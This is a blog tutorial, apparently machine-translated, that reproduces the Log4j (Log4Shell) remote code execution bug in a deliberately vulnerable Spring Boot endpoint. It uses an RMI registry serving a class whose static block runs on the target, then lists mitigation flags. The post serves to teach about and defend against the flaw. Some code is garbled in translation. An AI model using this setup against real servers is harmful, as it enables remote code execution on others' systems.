1. Foreground summary
The Log4j epic bug has been making a lot of noise these days, so I want to know what it is.
2. Build a SpringBoot project that integrates Log4j
Follow the instructions on the Spring website to create a SpringBoot project and make a change to the POM file
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>
</dependencies>
Copy the code
2.1 Viewing Imported Dependencies
As you can see, the log4j dependencies I introduced are below version 2.15.0, which triggers this bug
2.2 Write a common interface to accept external parameters
package run.runnable.learn;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.ResponseBody;
import javax.annotation.PostConstruct;
@SpringBootApplication
@Controller
public class LearnApplication {
private static final Logger logger = LogManager.getLogger(LearnApplication.class);
public static void main(String[] args) {
SpringApplication.run(LearnApplication.class, args);
}
@PostMapping("/hack")
@ResponseBody
public String testHackExecute(@RequestBody String content){
logger.info("content:{}", content);
returncontent; }}Copy the code
Here is a hack interface, when the interface has parameters passed in, it will print, this kind of code we almost have written it. That’s one of the reasons this bug is so serious: it’s easy to trigger
3. Test for bugs
3.1 Importing specified Parameters To print VM information
Using the Postman call interface, you can see a success return.
${Java :vm} ${Java :vm} ${Java :vm}
3.2 Test rmI remote calls
It would be nice if it were just the above, at least generating some error logs, but this RMI remote call is quite harmful.
Let’s write a registry using Java native RMI, and then register a service
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
Reference reference = new Reference("run.runnable.learn.rmi.HackExecute"."run.runnable.learn.rmi.HackExecute".null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
System.out.println("service started");
registry.bind("hack", referenceWrapper);
} catch(RemoteException | NamingException | AlreadyBoundException e) { e.printStackTrace(); }}Copy the code
One more class that can be executed
public class HackExecute {
static {
System.out.println("HackExecute: Successful execution." "); }}Copy the code
We started the above service rmI service and invoked it using Postman.
When we log on the console, you will see that the RMI remote call was successfully executed!
This means I can take my own code and run it on the other party’s server in this way, which is an epic bug.
4. Emergency remedies
(1) to modify the JVM parameter – Dlog4j2. FormatMsgNoLookups = true
(2) modify configuration log4j2. FormatMsgNoLookups = True
Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
4. Relevant information
Log4j remote code execution vulnerability exists in Apache. What impact will it bring to relevant enterprises? What other information is worth watching? – Answer by NLFox – Zhihu
Logging Services – Lookups
Important Note: Risk alert regarding the latest vulnerability of Apache Log4j 2 remote code execution
The article was first published on Pineapple’s blog